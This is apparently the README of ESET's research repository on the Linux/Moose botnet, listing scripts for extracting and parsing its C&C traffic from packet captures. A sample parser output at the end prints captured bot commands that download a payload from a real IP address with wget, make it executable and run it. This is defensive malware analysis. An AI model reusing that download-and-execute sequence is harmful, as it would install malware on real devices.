Linux/Moose

Copyright © 2015 ESET

Content of this repository

cnc1-fake-server.py

Run a fake configuration server that serves a static file

data/

Example captured data

extract_sample.sh

Extracts Telnet data. Useful to extract a sample of the echo infection method

ida/

IDA Python scripts

lib/

Shared code

parse_cnc1_10073reports.py

Extract messages described in the section Reporting a Peer Found to the Configuration C&C Server

parse_cnc1_config.py

Extracts C&C configuration messages

parse_cnc1_wordlist.py

Extracts the usernames and passwords provided in the C&C configuration

parse_cnc2_nattraversal.py

Extract relay C&C tunnel data

parse_cnc3_response.py

Extract report C&C responses

parse_cnc_request_bulk.py

Bulk extract config C&C requests (output to terminal)

parse_cnc_request_bulk.sh

Bulk extract config C&C requests (output to files)

parse_cnc_request.py

Extract information sent to C&C by infected bot

pcap-extract-10073-socks4.sh

Extract proxy service socks4 tunnel info

pcap-extract-10073-socks5.sh

Extract proxy service socks5 tunnel info

pcap-extract-traffic.sh

Wraps around tshark to gather interesting traffic patterns from pcaps

targeted-vendors/

List of device vendors that could be affected by Linux/Moose, with instructions for testing your own hardware.

router-check/

Source code for the tool that tests if your own router is reachable via Telnet and uses a weak or default username and password.

tshark_to_raw.py

Processes output of pcap-extract-traffic.sh and dumps raw binary contained in the traffic into files for further processing

wireshark-profile/

A Wireshark profile that prevents the HTTP dissector from kicking in

Conventions

  • Configuration C&C Server is cnc1

  • Relay C&C Server is cnc2

  • Report C&C Server is cnc3

Extracting information from Pcap captures

Scripts exist to extract relevant information from pcaps.

pcap-extract-traffic.sh

Runs the proper tshark command line and outputs the raw hex content to stdout.

tshark_to_raw.py

Re-assembles the TCP traffic and writes it to disk.

parse_cnc_config.py

Given a raw TCP stream, extracts the C&C configuration.

Example usage:

./pcap-extract-traffic.sh cnc1-response <file.pcap> | ./tshark_to_raw.py
./parse_cnc_config.py tcpstream-000022859.raw
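The re-assembly step of this pipeline, as an added example (not the repository's own tshark_to_raw.py): it assumes the tshark side emits one "stream index<TAB>hex payload" line per packet (for instance from `tshark -r file.pcap -T fields -e tcp.stream -e tcp.payload`), concatenates the payloads per stream, and writes them out with the tcpstream-<index>.raw naming used above.

```python
import re
from collections import OrderedDict
from pathlib import Path

# Constructed sample of tshark field output, one "<tcp.stream>\t<hex payload>"
# line per packet in capture order; stream 22859 spans two packets. This line
# format is an assumption of the example, not the repository's own format.
SAMPLE_TSHARK_OUTPUT = """\
22859\t48656c6c6f
22860\t4142
22859\t2c20776f726c64
22861\t
"""

HEX_RE = re.compile(r"^[0-9a-fA-F]*$")


def reassemble_streams(tshark_output):
    """Concatenate per-packet payloads by TCP stream index -> {index: bytes}.
    Empty payloads (pure ACKs) are skipped; malformed hex raises instead of
    silently truncating, so a damaged capture cannot corrupt a stream file."""
    streams = OrderedDict()
    for lineno, line in enumerate(tshark_output.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split("\t")
        if len(fields) != 2:
            raise ValueError("line %d: expected 2 fields" % lineno)
        stream_id, hexdata = fields
        hexdata = hexdata.replace(":", "")  # older tshark prints 48:65:6c:...
        if not hexdata:
            continue
        if not HEX_RE.match(hexdata) or len(hexdata) % 2:
            raise ValueError("line %d: malformed hex payload" % lineno)
        streams.setdefault(int(stream_id), bytearray()).extend(bytes.fromhex(hexdata))
    return OrderedDict((k, bytes(v)) for k, v in streams.items())


def write_streams(streams, outdir):
    """Write each stream as tcpstream-<9-digit index>.raw; return the paths."""
    outdir = Path(outdir)
    outdir.mkdir(parents=True, exist_ok=True)
    paths = []
    for stream_id, payload in streams.items():
        path = outdir / ("tcpstream-%09d.raw" % stream_id)
        path.write_bytes(payload)
        paths.append(path)
    return paths
```

Pipe the real tshark output into `reassemble_streams` and point `write_streams` at a working directory; the resulting .raw files are what the parse_cnc*.py scripts above consume.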

Parsing configuration files

$ ./parse_cnc3_response.py data/cnc3-response-got-shell.raw
{'cmd_0': u'cd /var\r\n',
 'cmd_1': u'rm ./elan2\r\n',
 'cmd_2': u'wget http://85.159.237.107/xx/atheros_mips/elan2\r\n',
 'cmd_3': u'chmod +x ./elan2\r\n',
 'cmd_4': u'./elan2\r\n'}